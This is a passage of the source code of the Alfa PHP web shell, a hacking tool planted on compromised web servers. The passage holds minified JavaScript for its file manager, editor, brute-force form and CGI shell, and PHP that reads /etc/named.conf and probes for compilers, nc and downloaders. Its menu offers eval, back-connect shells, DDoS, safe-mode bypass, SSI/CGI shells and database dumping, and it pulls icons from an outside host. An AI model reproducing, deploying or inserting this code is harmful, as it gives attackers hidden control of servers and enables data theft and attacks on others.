dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
  1061. </script>
  1062. <?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
  1063. <input type='hidden' name='a' value='dlfile'>
  1064. <input type='hidden' name='c' value=''>
  1065. <input type='hidden' name='file' value=''>
  1066. </form>
  1067. <input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
  1068. <div id='a_loader'><img src='".__showicon('loader')."'></div>";
  1069. $cmd_uname = alfaEx("uname -a",false,false);
  1070. $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
  1071. if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
  1072. echo '
  1073. </head>
  1074. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
  1075. <div id="up_bar_holder"></div>
  1076. <div class="whole">
  1077. <form method="post" name="mf" style="display:none;">
  1078. <input type="hidden" name="a">
  1079. <input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
  1080. for($s=1;$s<=10;$s++){
  1081. echo '<input type="hidden" name="alfa'.$s.'">';
  1082. }
  1083. echo '<input type="hidden" name="charset">
  1084. </form>
  1085. <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
  1086. <div class="header"><table width="100%" border="0">
  1087. <tr>
  1088. <td width="3%"><span class="header_vars">Uname:</span></td>
  1089. <td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
  1090. </tr>
  1091. <tr>
  1092. <td><span class="header_vars">User:</span></td>
  1093. <td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
  1094. <td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="lph team 2023" draggable="false" src="https://i.imgur.com/7aRsK2p.png" /></td>
  1095. </tr>
  1096. <tr>
  1097. <td><span class="header_vars">PHP:</span></td>
  1098. <td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
  1099. </tr>
  1100. <tr>
  1101. <td><span class="header_vars">ServerIP:</span></td>
  1102. <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
  1103. </tr>
  1104. <tr>
  1105. <td width="3%"><span class="header_vars">DateTime:</span></td>
  1106. <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
  1107. </tr>
  1108. <tr>
  1109. <td><span class="header_vars">Domains:</span></td>
  1110. <td width="76%"><span class="header_values" id="header_domains">';
  1111. if($GLOBALS['sys']=='unix'){
  1112. $d0mains = _alfa_file("/etc/named.conf",false);
  1113. if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
  1114. $count=0;
  1115. foreach($d0mains as $d0main){
  1116. if(@strstr($d0main,"zone")){
  1117. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1118. flush();
  1119. if(strlen(trim($domains[1][0])) > 2){
  1120. flush();
  1121. $count++;}}}
  1122. echo "$count Domains";}}
  1123. else{echo("Cant Read [ /etc/named.conf ]");}
  1124. echo '</span></td>
  1125. </tr>
  1126. <tr>
  1127. <td height="16"><span class="header_vars">HDD:</span></td>
  1128. <td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
  1129. </tr>';
  1130. if($GLOBALS['sys']=='unix'){
  1131. $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
  1132. if(!@ini_get('safe_mode')){
  1133. if(strlen(alfaEx("id",false,false))>0){
  1134. echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
  1135. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
  1136. $x=0;
  1137. foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
  1138. if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1139. echo '</td>
  1140. </tr>
  1141. <tr>
  1142. <td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
  1143. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1144. $x=0;
  1145. foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
  1146. if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1147. echo '</td>
  1148. </tr>';
  1149. }else{
  1150. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1151. }
  1152. }else{
  1153. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1154. }
  1155. }else{
  1156. echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
  1157. echo alfaEx('ver',false,false);
  1158. echo '</td>
  1159. </tr> <tr>
  1160. <td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
  1161. </tr></b>';
  1162. }
  1163. $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
  1164. echo '<tr>
  1165. <td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
  1166. </tr>
  1167. <tr>
  1168. <td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/alivosreal" target="_blank"><span><font class="solevisible-text" color="#FC0303">Thinker & Explorer</font></span></a></center></div></td>
  1169. </tr>
  1170. <tr>
  1171. <td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
  1172. </tr>
  1173. <tr>
  1174. <td height="11"><span class="header_vars">SoftWare: </span></td>
  1175. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
  1176. </tr>';
  1177. if($GLOBALS['sys']=="win"){
  1178. echo '<tr>
  1179. <td height="12"><span class="header_vars">DRIVE:</span></td>
  1180. <td colspan="2"><b>'.$drives.'</b></td>
  1181. </tr>';
  1182. }
  1183. echo '<tr>
  1184. <td height="12"><span class="header_vars">PWD:</span></td>
  1185. <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#action=fileman&path='.$GLOBALS['home_cwd'].'" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
  1186. </tr>
  1187. </table>
  1188. </div>
  1189. <div id="meunlist">
  1190. <ul>
  1191. ';
  1192. $li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
  1193. 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
